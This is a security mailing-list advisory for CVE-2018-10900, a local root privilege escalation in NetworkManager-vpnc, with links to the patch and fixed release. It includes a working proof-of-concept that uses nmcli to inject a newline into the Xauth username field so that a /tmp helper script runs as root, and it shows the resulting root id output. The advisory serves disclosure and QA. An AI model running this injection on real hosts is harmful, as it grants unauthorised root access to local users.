CVE-2018-10900: NetworkManager-vpnc-1.2.4 local privilege escalation

[Lubomir Rintel <lkundrak () v3 sk>]

Hi,

NetworkManager-vpnc-1.2.6 fixes a local authenticated root bug.

The bug was responsibly disclosed to us by Denis Andzakovic. Please
credit him if you issue an advisory for a product that ships the
affected code. His original advisory should be available soon at
https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc

CVE Number: CVE-2018-10900

Original Report (will be available soon):
https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc

Patch:
https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4

Release Notes:
https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.news

Patched Version:
https://download.gnome.org/sources/NetworkManager-vpnc/1.2/NetworkManager-vpnc-1.2.6.tar.xz

The exploit code for QA and documentation purposes follows:

cat <<EOF >/tmp/helper
#!/bin/bash
id >/tmp/pwned
EOF
chmod +x /tmp/helper
nmcli c add con-name poc type vpn ifname '*' vpn-type vpnc \
+vpn.data "IKE DH Group = dh2" \
+vpn.data "IPSec ID = bar" \
+vpn.data "IPSec gateway = 127.0.0.1" \
+vpn.data "IPSec secret-flags = 4" \
+vpn.data "Local Port = 0" \
+vpn.data "NAT Traversal Mode = natt" \
+vpn.data "Perfect Forward Secrecy = server" \
+vpn.data "Vendor = cisco" \
+vpn.data "Xauth password-flags = 4" \
+vpn.data "Xauth username = foo$(echo; echo Password helper
/tmp/helper)" \
+vpn.data "ipsec-secret-type = save" \
+vpn.data "xauth-password-type = save"
nmcli c up poc

$ cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)
context=system_u:system_r:vpnc_t:s0

Take care,
Lubo